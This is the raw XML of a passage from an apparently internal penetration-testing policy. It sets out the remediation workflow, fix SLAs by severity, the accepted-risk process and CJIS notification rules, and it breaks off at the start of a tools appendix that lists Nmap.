          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding reported and severity assigned by tester</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Dev team confirms reproducibility within 24 hours of report delivery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding assigned to an owner in the issue tracker (GitHub Issues / Jira)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix developed and deployed to staging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tester verifies fix in staging (or internal team if tester not available)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix deployed to production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding marked Resolved with resolution date</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">SLA Tracking Table</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40"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="3240"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Confirm Repro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix in Staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fix in Production</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify Fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Same day</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">24–48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">48–72 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Same day as prod deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5 business days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7 business days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Within 3 days of prod deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">48 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">21 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Within 7 days of prod deploy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">60 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="216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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="324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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">At next quarterly review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Next sprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Next release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3240"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">At next review</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Accepted Risk Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Not every finding will be remediated. When a finding is accepted as a known risk:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk acceptance must be approved by the CTO or VP Engineering in writing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The business justification must be documented</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">An expiry date must be set — accepted risks must be re-evaluated annually</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Compensating controls must be documented if available</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS-relevant findings cannot be accepted as risk — they must be remediated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2A40"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">CJIS Notification Requirement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Any Critical or High finding that affects the security of Criminal Justice Information must be reported to affected agency Information Security Officers within 24 hours of discovery, per CJIS Security Policy Section 5.10.4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="thick" w:color="EF4444" w:sz="8"/>
        </w:pBdr>
        <w:shd w:fill="FFF5F5" w:val="clear"/>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">⚠ WARNING: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="7F1D1D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure to notify affected agencies of a Critical finding within the CJIS-required timeframe is a compliance violation that may result in loss of CJIS connectivity for those agencies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix A — Quick Reference: Tools</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40"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="2880"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Primary Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Port Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
